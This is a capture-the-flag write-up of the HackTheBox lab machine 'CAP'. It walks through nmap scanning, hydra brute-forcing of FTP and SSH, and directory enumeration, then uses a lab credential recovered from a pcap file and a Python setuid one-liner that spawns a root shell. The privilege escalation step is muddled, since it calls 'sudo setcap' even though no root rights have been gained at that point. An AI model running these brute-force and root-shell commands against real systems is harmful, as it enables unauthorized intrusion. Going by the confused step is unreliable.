CAP 10.10.10.245

Background

CAP is a Linux base machine from HackTheBox that required your patient on web searching technique and using privilege escalation using SUID skills.
A statistic website, that saved user's network access records, was deployed. One of the records contained an FTP transaction history that stored the login id and password in cleartext. This credential can be used to access the target machine via ssh protocol.
After getting the initial access, using LinPEAS to search the possible privilege escalation loophole. Finally, it was found that the "Capabilities" of the python was the jump hole to the root access.
Target Machine: 10.10.10.245
Attacker Machine: 10.10.14.3

Hacking Process Part 0 – Service Scanning

Nmap

1) nmap -p- -T5 --min-rate=1000 10.10.10.245 -oG fkclai.nmap
2) nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.10.245 -o nmap-result.txt
1
# Nmap 7.80 scan initiated Thu Sep 2 22:52:29 2021 as: nmap -p 21,22,80, -sC -sV -o nmap-result.txt 10.10.10.245
2
Nmap scan report for 10.10.10.245
3
Host is up (0.35s latency).
4
5
PORT STATE SERVICE VERSION
6
21/tcp open ftp vsftpd 3.0.3
7
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
8
80/tcp open http gunicorn
9
| fingerprint-strings:
10
| FourOhFourRequest:
11
| HTTP/1.0 404 NOT FOUND
12
| Server: gunicorn
13
| Date: Thu, 02 Sep 2021 14:58:29 GMT
14
| Connection: close
15
| Content-Type: text/html; charset=utf-8
16
| Content-Length: 232
17
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
18
| <title>404 Not Found</title>
19
| <h1>Not Found</h1>
20
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
21
| GetRequest:
22
| HTTP/1.0 200 OK
23
| Server: gunicorn
24
| Date: Thu, 02 Sep 2021 14:58:21 GMT
25
| Connection: close
26
| Content-Type: text/html; charset=utf-8
27
| Content-Length: 19386
28
| <!DOCTYPE html>
29
| <html class="no-js" lang="en">
30
| <head>
31
| <meta charset="utf-8">
32
| <meta http-equiv="x-ua-compatible" content="ie=edge">
33
| <title>Security Dashboard</title>
34
| <meta name="viewport" content="width=device-width, initial-scale=1">
35
| <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
36
| <link rel="stylesheet" href="/static/css/bootstrap.min.css">
37
| <link rel="stylesheet" href="/static/css/font-awesome.min.css">
38
| <link rel="stylesheet" href="/static/css/themify-icons.css">
39
| <link rel="stylesheet" href="/static/css/metisMenu.css">
40
| <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
41
| <link rel="stylesheet" href="/static/css/slicknav.min.css">
42
| <!-- amchar
43
| HTTPOptions:
44
| HTTP/1.0 200 OK
45
| Server: gunicorn
46
| Date: Thu, 02 Sep 2021 14:58:22 GMT
47
| Connection: close
48
| Content-Type: text/html; charset=utf-8
49
| Allow: OPTIONS, GET, HEAD
50
| Content-Length: 0
51
| RTSPRequest:
52
| HTTP/1.1 400 Bad Request
53
| Connection: close
54
| Content-Type: text/html
55
| Content-Length: 196
56
| <html>
57
| <head>
58
| <title>Bad Request</title>
59
| </head>
60
| <body>
61
| <h1><p>Bad Request</p></h1>
62
| Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27;
63
| </body>
64
|_ </html>
65
|_http-server-header: gunicorn
66
|_http-title: Security Dashboard
67
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
68
SF-Port80-TCP:V=7.80%I=7%D=9/2%Time=6130E536%P=x86_64-pc-linux-gnu%r(GetRe
69
SF:quest,2FE5,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20T
70
SF:hu,\x2002\x20Sep\x202021\x2014:58:21\x20GMT\r\nConnection:\x20close\r\n
71
SF:Content-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x201938
72
SF:6\r\n\r\n<!DOCTYPE\x20html>\n<html\x20class=\"no-js\"\x20lang=\"en\">\n
73
SF:\n<head>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20
74
SF:<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\x20\x
75
SF:20\x20\x20<title>Security\x20Dashboard</title>\n\x20\x20\x20\x20<meta\x
76
SF:20name=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1
77
SF:\">\n\x20\x20\x20\x20<link\x20rel=\"shortcut\x20icon\"\x20type=\"image/
78
SF:png\"\x20href=\"/static/images/icon/favicon\.ico\">\n\x20\x20\x20\x20<l
79
SF:ink\x20rel=\"stylesheet\"\x20href=\"/static/css/bootstrap\.min\.css\">\
80
SF:n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/css/font
81
SF:-awesome\.min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20h
82
SF:ref=\"/static/css/themify-icons\.css\">\n\x20\x20\x20\x20<link\x20rel=\
83
SF:"stylesheet\"\x20href=\"/static/css/metisMenu\.css\">\n\x20\x20\x20\x20
84
SF:<link\x20rel=\"stylesheet\"\x20href=\"/static/css/owl\.carousel\.min\.c
85
SF:ss\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/cs
86
SF:s/slicknav\.min\.css\">\n\x20\x20\x20\x20<!--\x20amchar")%r(HTTPOptions
87
SF:,B3,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20Thu,\x20
88
SF:02\x20Sep\x202021\x2014:58:22\x20GMT\r\nConnection:\x20close\r\nContent
89
SF:-Type:\x20text/html;\x20charset=utf-8\r\nAllow:\x20OPTIONS,\x20GET,\x20
90
SF:HEAD\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,121,"HTTP/1\.1\x20
91
SF:400\x20Bad\x20Request\r\nConnection:\x20close\r\nContent-Type:\x20text/
92
SF:html\r\nContent-Length:\x20196\r\n\r\n<html>\n\x20\x20<head>\n\x20\x20\
93
SF:x20\x20<title>Bad\x20Request</title>\n\x20\x20</head>\n\x20\x20<body>\n
94
SF:\x20\x20\x20\x20<h1><p>Bad\x20Request</p></h1>\n\x20\x20\x20\x20Invalid
95
SF:\x20HTTP\x20Version\x20&#x27;Invalid\x20HTTP\x20Version:\x20&#x27;RTSP/
96
SF:1\.0&#x27;&#x27;\n\x20\x20</body>\n</html>\n")%r(FourOhFourRequest,189,
97
SF:"HTTP/1\.0\x20404\x20NOT\x20FOUND\r\nServer:\x20gunicorn\r\nDate:\x20Th
98
SF:u,\x2002\x20Sep\x202021\x2014:58:29\x20GMT\r\nConnection:\x20close\r\nC
99
SF:ontent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20232\r
100
SF:\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x203\.2\x20F
101
SF:inal//EN\">\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</h1>\
102
SF:n<p>The\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20serv
103
SF:er\.\x20If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x20che
104
SF:ck\x20your\x20spelling\x20and\x20try\x20again\.</p>\n");
105
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
106
107
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
108
# Nmap done at Thu Sep 2 22:55:03 2021 -- 1 IP address (1 host up) scanned in 154.69 seconds
109
Copied!

Enumeration stratgies

No vulnerability was found on the HTTP server and SSH/FTP service according to the Nmap result. we can only focus on the following two enumeration 1) FTP/SSH 2) Web enumeration

Hacking Process Part 1 – Enumeration

FTP/SSH enumeration Nothing can be done other than the brute focus attack on the FTP and SSH port. However, the result is negative.
1
ftp 21
2
hydra -l root -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.245
3
4
ssh 22
5
hydra -l root -P /usr/share/wordlists/rockyou.txt 10.10.10.245 -t 4 ssh
Copied!
Web enumeration 1) Searching hidden subfolders
1
dirb http://10.10.10.245/ /usr/share/wordlists/dirb/common.txt -o dirb-245.result
2
3
gobuster dir -u 'http://10.10.10.245/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-245.result
4
Copied!
the following subfolders were found and a list of subfolders under the data directory was found.
2) searching the website
When visiting the website found a download link that pointing to the pcap file. Download the firstpcap file fromhttp://cap.htb/data/18 No useful information was found after reading this file. Base on the result of folder enumeration above, an FTP login credential was found.

Hacking Process Part 2 – Gaining Foothold

Using the credential found at the pcap file, that can be successful ssh to the target machine and read the user.txt file.
nathan:Buck3tH4TF0RM3!
After getting the initial access, the next step is to upload the linpeas.sh and start the PE scanning.

Hacking Process Part 3 – Privilege Escalation

Because of the project name "CAP", a finding related to the Capabilities is interesting to me. when the binary has the Linux CAP_SETUID capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID.
After read several articles, the paper wrote by Raj Chandel provided a detailed explanation of how this capability can be gain the privilege escalation using the following command.
1
cp $(which python) .
2
sudo setcap cap_setuid+ep python
3
4
./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
Copied!

Conclusion

FTP is an insecure protocol that transfers data in plain text. It is the critical point that helps to gain the foothold. In addition, the user nathan received the privilege to run the python3 program as root is another security loophole.
The system admin should be aware of security loopholes during enabling system service and assigning such capability which can affect the integrity of the kernel that can lead to privilege escalation.

Reference